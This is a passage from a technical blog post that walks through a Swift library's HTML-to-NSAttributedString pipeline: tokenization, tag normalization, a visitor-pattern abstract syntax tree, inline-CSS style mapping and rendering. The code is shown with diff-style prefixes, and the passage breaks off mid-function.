+ let matchIsEndTag = substring(named: "closeTag")?.string.trimmingCharacters(in: .whitespacesAndNewlines) == "/"
+ // href="https://zhgchg.li", nil
+ // Use regex to further extract HTML attributes into [String: String], refer to the source code
+ let matchTagAttributes = parseAttributes(substring(named: "tagAttributes"))
+ // false, false
+ let matchIsSelfClosingTag = substring(named: "selfClosingTag")?.string.trimmingCharacters(in: .whitespacesAndNewlines) == "/"
+
+ if let matchTag = matchTag {
+ if matchIsSelfClosingTag {
+ // e.g. <br/>
+ tokenizationResult.append(.selfClosing(.init(tagName: matchTag, tagAttributedString: matchAttributedString, attributes: matchTagAttributes)))
+ } else {
+ // e.g. <a> or </a>
+ if matchIsEndTag {
+ // e.g. </a>
+ // Retrieve the position of the same tag name from the stack, starting from the last
+ if let index = stackStartItems.lastIndex(where: { $0.tagName == matchTag }) {
+ // If it's not the last one, it means there is a misalignment or a missing closing tag
+ if index != stackStartItems.count - 1 {
+ needFormatter = true
+ }
+ tokenizationResult.append(.close(.init(tagName: matchTag)))
+ stackStartItems.remove(at: index)
+ } else {
+ // Extra close tag e.g </a>
+ // Does not affect subsequent processing, just ignore
+ }
+ } else {
+ // e.g. <a>
+ let startItem: HTMLParsedResult.StartItem = HTMLParsedResult.StartItem(tagName: matchTag, tagAttributedString: matchAttributedString, attributes: matchTagAttributes)
+ tokenizationResult.append(.start(startItem))
+ // Add to stack
+ stackStartItems.append(startItem)
+ }
+ }
+ }
+
+ lastMatch = match
+ }
+}
+
+// Check the ending raw string
+// e.g. Test<a>Link</a>Test2 - > Test2
+if let lastMatch = lastMatch {
+ let currentIndex = lastMatch.range.upperBound
+ if totalLength > currentIndex {
+ // There are remaining strings
+ let resetString = attributedString.attributedSubstring(from: NSMakeRange(currentIndex, (totalLength - currentIndex)))
+ tokenizationResult.append(.rawString(resetString))
+ }
+} else {
+ // lastMatch = nil, meaning no tags were found, all are plain text
+ let resetString = attributedString.attributedSubstring(from: NSMakeRange(0, totalLength))
+ tokenizationResult.append(.rawString(resetString))
+}
+
+// Check if the stack is empty, if not, it means there are start tags without corresponding end tags
+// Mark as isolated start tags
+for stackStartItem in stackStartItems {
+ stackStartItem.isIsolated = true
+ needFormatter = true
+}
+
+print(tokenizationResult)
+// [
+// .start("a",["href":"https://zhgchg.li"])
+// .rawString("Li")
+// .start("b",nil)
+// .rawString("nk")
+// .close("a")
+// .rawString("Bold")
+// .close("b")
+// ]
+
Operation flow as shown in the figure
The final result will be an array of Tokenization results.
Corresponding source code in HTMLStringToParsedResultProcessor.swift implementation
a.k.a Formatter, normalization
After obtaining the preliminary parsing results in the previous step, if it is found during parsing that further normalization is needed, this step is required to automatically correct HTML Tag issues.
There are three types of HTML Tag issues:
- <br>: a tag without a corresponding closing tag (should become a self-closing tag)
- <Congratulation!>: plain text mistakenly written in the shape of an HTML tag
- <a>Li<b>nk</a>Bold</b>: misplaced (interleaved) tags
The correction method is also very simple: traverse the elements of the tokenization result and fill in the gaps.
Operation flow as shown in the figure
var normalizationResult = tokenizationResult
+
+// Start Tags Stack, First In Last Out (FILO)
+var stackExpectedStartItems: [HTMLParsedResult.StartItem] = []
+var itemIndex = 0
+while itemIndex < normalizationResult.count {
+ switch normalizationResult[itemIndex] {
+ case .start(let item):
+ if item.isIsolated {
+ // If it is an isolated Start Tag
+ if WC3HTMLTagName(rawValue: item.tagName) == nil && (item.attributes?.isEmpty ?? true) {
+ // If it is not a WCS defined HTML Tag & has no HTML Attribute
+ // WC3HTMLTagName Enum can refer to Source Code
+ // Determine as general text mistaken as HTML Tag
+ // Change to raw string type
+ normalizationResult[itemIndex] = .rawString(item.tagAttributedString)
+ } else {
+ // Otherwise, change to self-closing tag, e.g., <br> -> <br/>
+ normalizationResult[itemIndex] = .selfClosing(item.convertToSelfClosingParsedItem())
+ }
+ itemIndex += 1
+ } else {
+ // Normal Start Tag, add to Stack
+ stackExpectedStartItems.append(item)
+ itemIndex += 1
+ }
+ case .close(let item):
+ // Encounter Close Tag
+ // Get the Tags between the Start Stack Tag and this Close Tag
+ // e.g., <a><u><b>[CurrentIndex]</a></u></b> -> interval 0
+ // e.g., <a><u><b>[CurrentIndex]</a></u></b> -> interval b,u
+
+ let reversedStackExpectedStartItems = Array(stackExpectedStartItems.reversed())
+ guard let reversedStackExpectedStartItemsOccurredIndex = reversedStackExpectedStartItems.firstIndex(where: { $0.tagName == item.tagName }) else {
+ itemIndex += 1
+ continue
+ }
+
+ let reversedStackExpectedStartItemsOccurred = Array(reversedStackExpectedStartItems.prefix(upTo: reversedStackExpectedStartItemsOccurredIndex))
+
+ // Interval 0, means no tag misalignment
+ guard reversedStackExpectedStartItemsOccurred.count != 0 else {
+ // is pair, pop
+ stackExpectedStartItems.removeLast()
+ itemIndex += 1
+ continue
+ }
+
+ // There are other tags in between; automatically close them before the close tag and reopen them after it
+ // e.g., <a><u><b>[CurrentIndex]</a></u></b>
+ // -> <a><u><b>[CurrentIndex]</b></u></a><u><b></u></b>
+ let stackExpectedStartItemsOccurred = Array(reversedStackExpectedStartItemsOccurred.reversed())
+ let afterItems = stackExpectedStartItemsOccurred.map({ HTMLParsedResult.start($0) })
+ let beforeItems = reversedStackExpectedStartItemsOccurred.map({ HTMLParsedResult.close($0.convertToCloseParsedItem()) })
+ normalizationResult.insert(contentsOf: afterItems, at: normalizationResult.index(after: itemIndex))
+ normalizationResult.insert(contentsOf: beforeItems, at: itemIndex)
+
+ itemIndex = normalizationResult.index(after: itemIndex) + stackExpectedStartItemsOccurred.count
+
+ // Update Start Stack Tags
+ // e.g., -> b,u
+ stackExpectedStartItems.removeAll { startItem in
+ return reversedStackExpectedStartItems.prefix(through: reversedStackExpectedStartItemsOccurredIndex).contains(where: { $0 === startItem })
+ }
+ case .selfClosing, .rawString:
+ itemIndex += 1
+ }
+}
+
+print(normalizationResult)
+// [
+// .start("a",["href":"https://zhgchg.li"])
+// .rawString("Li")
+// .start("b",nil)
+// .rawString("nk")
+// .close("b")
+// .close("a")
+// .start("b",nil)
+// .rawString("Bold")
+// .close("b")
+// ]
+
Corresponding implementation in the source code HTMLParsedResultFormatterProcessor.swift
a.k.a. AST, Abstract Syntax Tree
After the Tokenization & Normalization data preprocessing is completed, the result needs to be converted into an abstract tree 🌲.
As shown in the figure
Converting into an abstract tree facilitates our future operations and extensions, such as implementing Selector functionality or other conversions like HTML to Markdown; or if we want to add Markdown to NSAttributedString in the future, we only need to implement Markdown’s Tokenization & Normalization to complete it.
First, we define a Markup Protocol with Child & Parent properties to record the information of leaves and branches:
protocol Markup: AnyObject {
+ var parentMarkup: Markup? { get set }
+ var childMarkups: [Markup] { get set }
+
+ func appendChild(markup: Markup)
+ func prependChild(markup: Markup)
+ func accept<V: MarkupVisitor>(_ visitor: V) -> V.Result
+}
+
+extension Markup {
+ func appendChild(markup: Markup) {
+ markup.parentMarkup = self
+ childMarkups.append(markup)
+ }
+
+ func prependChild(markup: Markup) {
+ markup.parentMarkup = self
+ childMarkups.insert(markup, at: 0)
+ }
+}
+
Additionally, using the Visitor Pattern, each style attribute is defined as an object Element, and different Visit strategies are used to obtain individual application results.
protocol MarkupVisitor {
+ associatedtype Result
+
+ func visit(markup: Markup) -> Result
+
+ func visit(_ markup: RootMarkup) -> Result
+ func visit(_ markup: RawStringMarkup) -> Result
+
+ func visit(_ markup: BoldMarkup) -> Result
+ func visit(_ markup: LinkMarkup) -> Result
+ //...
+}
+
+extension MarkupVisitor {
+ func visit(markup: Markup) -> Result {
+ return markup.accept(self)
+ }
+}
+
Basic Markup nodes:
// Root node
+final class RootMarkup: Markup {
+ weak var parentMarkup: Markup? = nil
+ var childMarkups: [Markup] = []
+
+ func accept<V>(_ visitor: V) -> V.Result where V : MarkupVisitor {
+ return visitor.visit(self)
+ }
+}
+
+// Leaf node
+final class RawStringMarkup: Markup {
+ let attributedString: NSAttributedString
+
+ init(attributedString: NSAttributedString) {
+ self.attributedString = attributedString
+ }
+
+ weak var parentMarkup: Markup? = nil
+ var childMarkups: [Markup] = []
+
+ func accept<V>(_ visitor: V) -> V.Result where V : MarkupVisitor {
+ return visitor.visit(self)
+ }
+}
+
Define Markup Style Nodes:
// Branch nodes:
+
+// Link style
+final class LinkMarkup: Markup {
+ weak var parentMarkup: Markup? = nil
+ var childMarkups: [Markup] = []
+
+ func accept<V>(_ visitor: V) -> V.Result where V : MarkupVisitor {
+ return visitor.visit(self)
+ }
+}
+
+// Bold style
+final class BoldMarkup: Markup {
+ weak var parentMarkup: Markup? = nil
+ var childMarkups: [Markup] = []
+
+ func accept<V>(_ visitor: V) -> V.Result where V : MarkupVisitor {
+ return visitor.visit(self)
+ }
+}
+
Corresponding implementation in the source code Markup
Before converting to an abstract tree, we also need one more thing: because the tree structure itself does not carry any data (for example, a LinkMarkup node needs the URL information to perform later rendering), we define a container that stores each tree node together with its related data:
protocol MarkupComponent {
+ associatedtype T
+ var markup: Markup { get }
+ var value: T { get }
+
+ init(markup: Markup, value: T)
+}
+
+extension Sequence where Iterator.Element: MarkupComponent {
+ func value(markup: Markup) -> Element.T? {
+ return self.first(where:{ $0.markup === markup })?.value as? Element.T
+ }
+}
+
Corresponding implementation in the source code MarkupComponent
You can also declare Markup as Hashable and directly use a Dictionary to store values ([Markup: Any]), but in this way Markup cannot be used as a general type and needs to be prefixed with any Markup.
We also abstracted the HTML Tag Name part, allowing users to decide which tags need to be processed and facilitating future extensions. For example, the <strong> Tag Name can also correspond to BoldMarkup.
public protocol HTMLTagName {
+ var string: String { get }
+ func accept<V: HTMLTagNameVisitor>(_ visitor: V) -> V.Result
+}
+
+public struct A_HTMLTagName: HTMLTagName {
+ public let string: String = WC3HTMLTagName.a.rawValue
+
+ public init() {
+
+ }
+
+ public func accept<V>(_ visitor: V) -> V.Result where V : HTMLTagNameVisitor {
+ return visitor.visit(self)
+ }
+}
+
+public struct B_HTMLTagName: HTMLTagName {
+ public let string: String = WC3HTMLTagName.b.rawValue
+
+ public init() {
+
+ }
+
+ public func accept<V>(_ visitor: V) -> V.Result where V : HTMLTagNameVisitor {
+ return visitor.visit(self)
+ }
+}
+
Corresponding implementation in the source code HTMLTagNameVisitor
Additionally, refer to the W3C wiki which lists the HTML tag name enum: WC3HTMLTagName.swift
HTMLTag is simply a container object because we want to allow external specification of the style corresponding to the HTML Tag, so we declare a container to put them together:
struct HTMLTag {
+ let tagName: HTMLTagName
+ let customStyle: MarkupStyle? // Render will be explained later
+
+ init(tagName: HTMLTagName, customStyle: MarkupStyle? = nil) {
+ self.tagName = tagName
+ self.customStyle = customStyle
+ }
+}
+
Corresponding implementation in the source code HTMLTag
struct HTMLTagNameToMarkupVisitor: HTMLTagNameVisitor {
+ typealias Result = Markup
+
+ let attributes: [String: String]?
+
+ func visit(_ tagName: A_HTMLTagName) -> Result {
+ return LinkMarkup()
+ }
+
+ func visit(_ tagName: B_HTMLTagName) -> Result {
+ return BoldMarkup()
+ }
+ //...
+}
+
Corresponding implementation in the source code HTMLTagNameToHTMLMarkupVisitor
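As mentioned earlier, this is also where a tag like <strong> can be routed to the same node as <b>. A minimal sketch of the idea, building on the types above (simplified, not copied from the source):

// Sketch: inside the tag-name-to-markup visitor, <strong> can return the same
// node type as <b>, so both end up rendered through the bold style later on.
extension HTMLTagNameToMarkupVisitor {
    func visit(_ tagName: STRONG_HTMLTagName) -> Result {
        return BoldMarkup()
    }
}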
We need to convert the result of the normalized HTML data into an abstract tree. First, declare a MarkupComponent data structure that can store HTML data:
struct HTMLElementMarkupComponent: MarkupComponent {
+ struct HTMLElement {
+ let tag: HTMLTag
+ let tagAttributedString: NSAttributedString
+ let attributes: [String: String]?
+ }
+
+ typealias T = HTMLElement
+
+ let markup: Markup
+ let value: HTMLElement
+ init(markup: Markup, value: HTMLElement) {
+ self.markup = markup
+ self.value = value
+ }
+}
+
Convert to Markup Abstract Tree:
var htmlElementComponents: [HTMLElementMarkupComponent] = []
+let rootMarkup = RootMarkup()
+var currentMarkup: Markup = rootMarkup
+
+let htmlTags: [String: HTMLTag]
+init(htmlTags: [HTMLTag]) {
+ self.htmlTags = Dictionary(uniqueKeysWithValues: htmlTags.map{ ($0.tagName.string, $0) })
+}
+
+// Start Tags Stack, ensure correct pop tag
+// Normalization has already been done before, it should not go wrong, just to ensure
+var stackExpectedStartItems: [HTMLParsedResult.StartItem] = []
+for thisItem in from {
+ switch thisItem {
+ case .start(let item):
+ let visitor = HTMLTagNameToMarkupVisitor(attributes: item.attributes)
+ let htmlTag = self.htmlTags[item.tagName] ?? HTMLTag(tagName: ExtendTagName(item.tagName))
+ // Use Visitor to ask for the corresponding Markup
+ let markup = visitor.visit(tagName: htmlTag.tagName)
+
+ // Add itself to the current branch's leaf node
+ // Itself becomes the current branch node
+ htmlElementComponents.append(.init(markup: markup, value: .init(tag: htmlTag, tagAttributedString: item.tagAttributedString, attributes: item.attributes)))
+ currentMarkup.appendChild(markup: markup)
+ currentMarkup = markup
+
+ stackExpectedStartItems.append(item)
+ case .selfClosing(let item):
+ // Directly add to the current branch's leaf node
+ let visitor = HTMLTagNameToMarkupVisitor(attributes: item.attributes)
+ let htmlTag = self.htmlTags[item.tagName] ?? HTMLTag(tagName: ExtendTagName(item.tagName))
+ let markup = visitor.visit(tagName: htmlTag.tagName)
+ htmlElementComponents.append(.init(markup: markup, value: .init(tag: htmlTag, tagAttributedString: item.tagAttributedString, attributes: item.attributes)))
+ currentMarkup.appendChild(markup: markup)
+ case .close(let item):
+ if let lastTagName = stackExpectedStartItems.popLast()?.tagName,
+ lastTagName == item.tagName {
+ // When encountering Close Tag, return to the previous level
+ currentMarkup = currentMarkup.parentMarkup ?? currentMarkup
+ }
+ case .rawString(let attributedString):
+ // Directly add to the current branch's leaf node
+ currentMarkup.appendChild(markup: RawStringMarkup(attributedString: attributedString))
+ }
+}
+
+// print(htmlElementComponents)
+// [(markup: LinkMarkup, (tag: a, attributes: ["href":"zhgchg.li"]...)]
+
Operation result as shown in the figure
Corresponding source code implementation in HTMLParsedResultToHTMLElementWithRootMarkupProcessor.swift
1
+2
+3
+4
+5
+6
+7
+8
+9
+10
+11
+12
+13
+14
+15
+16
+
public class HTMLSelector: CustomStringConvertible {
+
+ let markup: Markup
+ let componets: [HTMLElementMarkupComponent]
+ init(markup: Markup, componets: [HTMLElementMarkupComponent]) {
+ self.markup = markup
+ self.componets = componets
+ }
+
+ public func filter(_ htmlTagName: String) -> [HTMLSelector] {
+ let result = markup.childMarkups.filter({ componets.value(markup: $0)?.tag.tagName.isEqualTo(htmlTagName) ?? false })
+ return result.map({ .init(markup: $0, componets: componets) })
+ }
+
+ //...
+}
+
We can filter leaf node objects layer by layer.
Corresponding source code implementation in HTMLSelector
Next, we need to complete the conversion of HTML to MarkupStyle (NSAttributedString.Key).
NSAttributedString sets the text style through NSAttributedString.Key Attributes. We abstract all fields of NSAttributedString.Key to correspond to MarkupStyle, MarkupStyleColor, MarkupStyleFont, MarkupStyleParagraphStyle.
Purpose:
- NSAttributedString styles are ultimately just a [NSAttributedString.Key: Any?] dictionary. If it were exposed directly, it would be hard to control the values users provide, and invalid values (such as .font: 123) could cause crashes.
- Styles need to support inheritance, e.g. <a><b>test</b></a>, where the style of the test string inherits bold from the link (bold + link); if the dictionary were exposed directly, it would be hard to control the inheritance rules.
public struct MarkupStyle {
+ public var font:MarkupStyleFont
+ public var paragraphStyle:MarkupStyleParagraphStyle
+ public var foregroundColor:MarkupStyleColor? = nil
+ public var backgroundColor:MarkupStyleColor? = nil
+ public var ligature:NSNumber? = nil
+ public var kern:NSNumber? = nil
+ public var tracking:NSNumber? = nil
+ public var strikethroughStyle:NSUnderlineStyle? = nil
+ public var underlineStyle:NSUnderlineStyle? = nil
+ public var strokeColor:MarkupStyleColor? = nil
+ public var strokeWidth:NSNumber? = nil
+ public var shadow:NSShadow? = nil
+ public var textEffect:String? = nil
+ public var attachment:NSTextAttachment? = nil
+ public var link:URL? = nil
+ public var baselineOffset:NSNumber? = nil
+ public var underlineColor:MarkupStyleColor? = nil
+ public var strikethroughColor:MarkupStyleColor? = nil
+ public var obliqueness:NSNumber? = nil
+ public var expansion:NSNumber? = nil
+ public var writingDirection:NSNumber? = nil
+ public var verticalGlyphForm:NSNumber? = nil
+ //...
+
+ // Inherited from...
+ // Default: When the field is nil, fill in the current data object from 'from'
+ mutating func fillIfNil(from: MarkupStyle?) {
+ guard let from = from else { return }
+
+ var currentFont = self.font
+ currentFont.fillIfNil(from: from.font)
+ self.font = currentFont
+
+ var currentParagraphStyle = self.paragraphStyle
+ currentParagraphStyle.fillIfNil(from: from.paragraphStyle)
+ self.paragraphStyle = currentParagraphStyle
+ //..
+ }
+
+ // MarkupStyle to NSAttributedString.Key: Any
+ func render() -> [NSAttributedString.Key: Any] {
+ var data: [NSAttributedString.Key: Any] = [:]
+
+ if let font = font.getFont() {
+ data[.font] = font
+ }
+
+ if let ligature = self.ligature {
+ data[.ligature] = ligature
+ }
+ //...
+ return data
+ }
+}
+
+public struct MarkupStyleFont: MarkupStyleItem {
+ public enum FontWeight {
+ case style(FontWeightStyle)
+ case rawValue(CGFloat)
+ }
+ public enum FontWeightStyle: String {
+ case ultraLight, light, thin, regular, medium, semibold, bold, heavy, black
+ // ...
+ }
+
+ public var size: CGFloat?
+ public var weight: FontWeight?
+ public var italic: Bool?
+ //...
+}
+
+public struct MarkupStyleParagraphStyle: MarkupStyleItem {
+ public var lineSpacing:CGFloat? = nil
+ public var paragraphSpacing:CGFloat? = nil
+ public var alignment:NSTextAlignment? = nil
+ public var headIndent:CGFloat? = nil
+ public var tailIndent:CGFloat? = nil
+ public var firstLineHeadIndent:CGFloat? = nil
+ public var minimumLineHeight:CGFloat? = nil
+ public var maximumLineHeight:CGFloat? = nil
+ public var lineBreakMode:NSLineBreakMode? = nil
+ public var baseWritingDirection:NSWritingDirection? = nil
+ public var lineHeightMultiple:CGFloat? = nil
+ public var paragraphSpacingBefore:CGFloat? = nil
+ public var hyphenationFactor:Float? = nil
+ public var usesDefaultHyphenation:Bool? = nil
+ public var tabStops: [NSTextTab]? = nil
+ public var defaultTabInterval:CGFloat? = nil
+ public var textLists: [NSTextList]? = nil
+ public var allowsDefaultTighteningForTruncation:Bool? = nil
+ public var lineBreakStrategy: NSParagraphStyle.LineBreakStrategy? = nil
+ //...
+}
+
+public struct MarkupStyleColor {
+ let red: Int
+ let green: Int
+ let blue: Int
+ let alpha: CGFloat
+ //...
+}
+
Corresponding implementation in the source code MarkupStyle
Additionally, referring to the W3C wiki of browser-predefined color names, the mapping from color name text to R, G, B values is enumerated in MarkupStyleColorName.swift
Let's talk a bit more about these two objects, because HTML tags can also be styled through inline CSS; for this we apply the same abstraction used for HTMLTagName to the HTML style attributes.
For example, HTML might provide <a style="color:red;font-size:14px">RedLink</a>, which means this link should be rendered in red at a font size of 14px.
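Before visiting each style attribute, the inline style string has to be split into key/value pairs; a minimal sketch of that preprocessing (the real parsing lives in the visitor/processor code shown later):

import Foundation

// Sketch: split an inline CSS string such as "color:red;font-size:14px"
// into key/value pairs, trimming whitespace around each token.
let styleString = "color:red;font-size:14px"
let stylePairs: [(key: String, value: String)] = styleString
    .split(separator: ";")
    .compactMap { declaration in
        let parts = declaration.split(separator: ":")
        guard parts.count == 2 else { return nil }
        return (parts[0].trimmingCharacters(in: .whitespacesAndNewlines),
                parts[1].trimmingCharacters(in: .whitespacesAndNewlines))
    }
// stylePairs == [("color", "red"), ("font-size", "14px")]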
public protocol HTMLTagStyleAttribute {
+ var styleName: String { get }
+
+ func accept<V: HTMLTagStyleAttributeVisitor>(_ visitor: V) -> V.Result
+}
+
+public protocol HTMLTagStyleAttributeVisitor {
+ associatedtype Result
+
+ func visit(styleAttribute: HTMLTagStyleAttribute) -> Result
+ func visit(_ styleAttribute: ColorHTMLTagStyleAttribute) -> Result
+ func visit(_ styleAttribute: FontSizeHTMLTagStyleAttribute) -> Result
+ //...
+}
+
+public extension HTMLTagStyleAttributeVisitor {
+ func visit(styleAttribute: HTMLTagStyleAttribute) -> Result {
+ return styleAttribute.accept(self)
+ }
+}
+
Corresponding implementation in the source code HTMLTagStyleAttribute
struct HTMLTagStyleAttributeToMarkupStyleVisitor: HTMLTagStyleAttributeVisitor {
+ typealias Result = MarkupStyle?
+
+ let value: String
+
+ func visit(_ styleAttribute: ColorHTMLTagStyleAttribute) -> Result {
+ // Regex to extract Color Hex or Mapping from HTML Pre-defined Color Name, please refer to the Source Code
+ guard let color = MarkupStyleColor(string: value) else { return nil }
+ return MarkupStyle(foregroundColor: color)
+ }
+
+ func visit(_ styleAttribute: FontSizeHTMLTagStyleAttribute) -> Result {
+ // Regex to extract 10px -> 10, please refer to the Source Code
+ guard let size = self.convert(fromPX: value) else { return nil }
+ return MarkupStyle(font: MarkupStyleFont(size: CGFloat(size)))
+ }
+ // ...
+}
+
Corresponding implementation in the source code HTMLTagAttributeToMarkupStyleVisitor.swift
The value passed to init is the attribute's value; depending on which visit overload is hit, it is converted into the corresponding MarkupStyle field.
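Usage then looks roughly like this (a hedged sketch built on the types above):

// Sketch: feeding the attribute's value into the visitor yields a partial MarkupStyle.
let colorStyle = HTMLTagStyleAttributeToMarkupStyleVisitor(value: "red")
    .visit(ColorHTMLTagStyleAttribute())
// colorStyle?.foregroundColor now carries the red color

let sizeStyle = HTMLTagStyleAttributeToMarkupStyleVisitor(value: "14px")
    .visit(FontSizeHTMLTagStyleAttribute())
// sizeStyle?.font.size == 14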
After introducing the MarkupStyle object, we need to convert the result of Normalization’s HTMLElementComponents into MarkupStyle.
// MarkupStyle policy
+public enum MarkupStylePolicy {
+ case respectMarkupStyleFromCode // Prioritize from Code, fill in with HTML Style Attribute
+ case respectMarkupStyleFromHTMLStyleAttribute // Prioritize from HTML Style Attribute, fill in with Code
+}
+
+struct HTMLElementMarkupComponentMarkupStyleVisitor: MarkupVisitor {
+
+ typealias Result = MarkupStyle?
+
+ let policy: MarkupStylePolicy
+ let components: [HTMLElementMarkupComponent]
+ let styleAttributes: [HTMLTagStyleAttribute]
+
+ func visit(_ markup: BoldMarkup) -> Result {
+ // .bold is just a default style defined in MarkupStyle, please refer to the Source Code
+ return defaultVisit(components.value(markup: markup), defaultStyle: .bold)
+ }
+
+ func visit(_ markup: LinkMarkup) -> Result {
+ // .link is just a default style defined in MarkupStyle, please refer to the Source Code
+ var markupStyle = defaultVisit(components.value(markup: markup), defaultStyle: .link) ?? .link
+
+ // Get the HtmlElement corresponding to LinkMarkup from HtmlElementComponents
+ // Find the href parameter from the attributes of HtmlElement (HTML carries URL String)
+ if let href = components.value(markup: markup)?.attributes?["href"] as? String,
+ let url = URL(string: href) {
+ markupStyle.link = url
+ }
+ return markupStyle
+ }
+
+ // ...
+}
+
+extension HTMLElementMarkupComponentMarkupStyleVisitor {
+ // Get the custom MarkupStyle specified in the HTMLTag container
+ private func customStyle(_ htmlElement: HTMLElementMarkupComponent.HTMLElement?) -> MarkupStyle? {
+ guard let customStyle = htmlElement?.tag.customStyle else {
+ return nil
+ }
+ return customStyle
+ }
+
+ // Default action
+ func defaultVisit(_ htmlElement: HTMLElementMarkupComponent.HTMLElement?, defaultStyle: MarkupStyle? = nil) -> Result {
+ var markupStyle: MarkupStyle? = customStyle(htmlElement) ?? defaultStyle
+ // Get the HtmlElement corresponding to LinkMarkup from HtmlElementComponents
+ // Check if the attributes of HtmlElement have a `Style` Attribute
+ guard let styleString = htmlElement?.attributes?["style"],
+ styleAttributes.count > 0 else {
+ // No
+ return markupStyle
+ }
+
+ // Has Style Attributes
+ // Split the Style Value string into an array
+ // font-size:14px;color:red -> ["font-size":"14px","color":"red"]
+ let styles = styleString.split(separator: ";").filter { $0.trimmingCharacters(in: .whitespacesAndNewlines) != "" }.map { $0.split(separator: ":") }
+
+ for style in styles {
+ guard style.count == 2 else {
+ continue
+ }
+ // e.g font-size
+ let key = style[0].trimmingCharacters(in: .whitespacesAndNewlines)
+ // e.g. 14px
+ let value = style[1].trimmingCharacters(in: .whitespacesAndNewlines)
+
+ if let styleAttribute = styleAttributes.first(where: { $0.isEqualTo(styleName: key) }) {
+ // Use the HTMLTagStyleAttributeToMarkupStyleVisitor mentioned above to convert back to MarkupStyle
+ let visitor = HTMLTagStyleAttributeToMarkupStyleVisitor(value: value)
+ if var thisMarkupStyle = visitor.visit(styleAttribute: styleAttribute) {
+ // When Style Attribute has a return value..
+ // Merge the result of the previous MarkupStyle
+ thisMarkupStyle.fillIfNil(from: markupStyle)
+ markupStyle = thisMarkupStyle
+ }
+ }
+ }
+
+ // If there is a default Style
+ if var defaultStyle = defaultStyle {
+ switch policy {
+ case .respectMarkupStyleFromHTMLStyleAttribute:
+ // Prioritize Style Attribute MarkupStyle, then
+ // Merge the result of defaultStyle
+ markupStyle?.fillIfNil(from: defaultStyle)
+ case .respectMarkupStyleFromCode:
+ // Prioritize defaultStyle, then
+ // Merge the result of Style Attribute MarkupStyle
+ defaultStyle.fillIfNil(from: markupStyle)
+ markupStyle = defaultStyle
+ }
+ }
+
+ return markupStyle
+ }
+}
+
Corresponding implementation in the source code HTMLTagAttributeToMarkupStyleVisitor.swift
We also define some default styles in MarkupStyle; a Markup falls back to its default style when no style is specified from outside the code.
There are two style priority strategies, as defined by the MarkupStylePolicy enum above: respectMarkupStyleFromCode and respectMarkupStyleFromHTMLStyleAttribute.
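As a rough illustration of such a default style (hypothetical values; the actual defaults live in the library's MarkupStyle definitions):

import UIKit

// Sketch: hypothetical re-creation of the .bold / .link defaults; real values are in the source code.
extension MarkupStyle {
    static var bold: MarkupStyle {
        return MarkupStyle(font: MarkupStyleFont(weight: .style(.semibold)))
    }

    static var link: MarkupStyle {
        var style = MarkupStyle(font: MarkupStyleFont())
        style.foregroundColor = MarkupStyleColor(red: 0, green: 122, blue: 255, alpha: 1)
        style.underlineStyle = .single
        return style
    }
}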
Convert the Normalization result into AST & MarkupStyleComponent.
Declare a new MarkupComponent to store the corresponding MarkupStyle:
struct MarkupStyleComponent: MarkupComponent {
+ typealias T = MarkupStyle
+
+ let markup: Markup
+ let value: MarkupStyle
+ init(markup: Markup, value: MarkupStyle) {
+ self.markup = markup
+ self.value = value
+ }
+}
+
Simple traversal of the Markup Tree & HTMLElementMarkupComponent structure:
let styleAttributes: [HTMLTagStyleAttribute]
+let policy: MarkupStylePolicy
+
+func process(from: (Markup, [HTMLElementMarkupComponent])) -> [MarkupStyleComponent] {
+ var components: [MarkupStyleComponent] = []
+ let visitor = HTMLElementMarkupComponentMarkupStyleVisitor(policy: policy, components: from.1, styleAttributes: styleAttributes)
+ walk(markup: from.0, visitor: visitor, components: &components)
+ return components
+}
+
+func walk(markup: Markup, visitor: HTMLElementMarkupComponentMarkupStyleVisitor, components: inout [MarkupStyleComponent]) {
+
+ if let markupStyle = visitor.visit(markup: markup) {
+ components.append(.init(markup: markup, value: markupStyle))
+ }
+
+ for markup in markup.childMarkups {
+ walk(markup: markup, visitor: visitor, components: &components)
+ }
+}
+
+// print(components)
+// [(markup: LinkMarkup, MarkupStyle(link: https://zhgchg.li, color: .blue)]
+// [(markup: BoldMarkup, MarkupStyle(font: .init(weight: .bold))]
+
Corresponding implementation in the original code HTMLElementWithMarkupToMarkupStyleProcessor.swift
The process result is shown in the above image
Now that we have the HTML Tag abstract tree structure and the MarkupStyle corresponding to the HTML Tag, the final step is to produce the final NSAttributedString rendering result.
visit markup to NSAttributedString
struct MarkupNSAttributedStringVisitor: MarkupVisitor {
+ typealias Result = NSAttributedString
+
+ let components: [MarkupStyleComponent]
+ // root / base MarkupStyle, specified externally, for example, the size of the entire string
+ let rootStyle: MarkupStyle?
+
+ func visit(_ markup: RootMarkup) -> Result {
+ // Look down to the RawString object
+ return collectAttributedString(markup)
+ }
+
+ func visit(_ markup: RawStringMarkup) -> Result {
+ // Return Raw String
+ // Collect all MarkupStyles in the chain
+ // Apply Style to NSAttributedString
+ return applyMarkupStyle(markup.attributedString, with: collectMarkupStyle(markup))
+ }
+
+ func visit(_ markup: BoldMarkup) -> Result {
+ // Look down to the RawString object
+ return collectAttributedString(markup)
+ }
+
+ func visit(_ markup: LinkMarkup) -> Result {
+ // Look down to the RawString object
+ return collectAttributedString(markup)
+ }
+ // ...
+}
+
+private extension MarkupNSAttributedStringVisitor {
+ // Apply Style to NSAttributedString
+ func applyMarkupStyle(_ attributedString: NSAttributedString, with markupStyle: MarkupStyle?) -> NSAttributedString {
+ guard let markupStyle = markupStyle else { return attributedString }
+ let mutableAttributedString = NSMutableAttributedString(attributedString: attributedString)
+ mutableAttributedString.addAttributes(markupStyle.render(), range: NSMakeRange(0, mutableAttributedString.string.utf16.count))
+ return mutableAttributedString
+ }
+
+ func collectAttributedString(_ markup: Markup) -> NSMutableAttributedString {
+ // collect from downstream
+ // Root -> Bold -> String("Bold")
+ // \
+ // > String("Test")
+ // Result: Bold Test
+ // Recursively visit and combine the final NSAttributedString by looking down layer by layer for raw strings
+ return markup.childMarkups.compactMap({ visit(markup: $0) }).reduce(NSMutableAttributedString()) { partialResult, attributedString in
+ partialResult.append(attributedString)
+ return partialResult
+ }
+ }
+
+ func collectMarkupStyle(_ markup: Markup) -> MarkupStyle? {
+ // collect from upstream
+ // String("Test") -> Bold -> Italic -> Root
+ // Result: style: Bold+Italic
+ // Inherit styles layer by layer by looking up for parent tag's markupstyle
+ var currentMarkup: Markup? = markup.parentMarkup
+ var currentStyle = components.value(markup: markup)
+ while let thisMarkup = currentMarkup {
+ guard let thisMarkupStyle = components.value(markup: thisMarkup) else {
+ currentMarkup = thisMarkup.parentMarkup
+ continue
+ }
+
+ if var thisCurrentStyle = currentStyle {
+ thisCurrentStyle.fillIfNil(from: thisMarkupStyle)
+ currentStyle = thisCurrentStyle
+ } else {
+ currentStyle = thisMarkupStyle
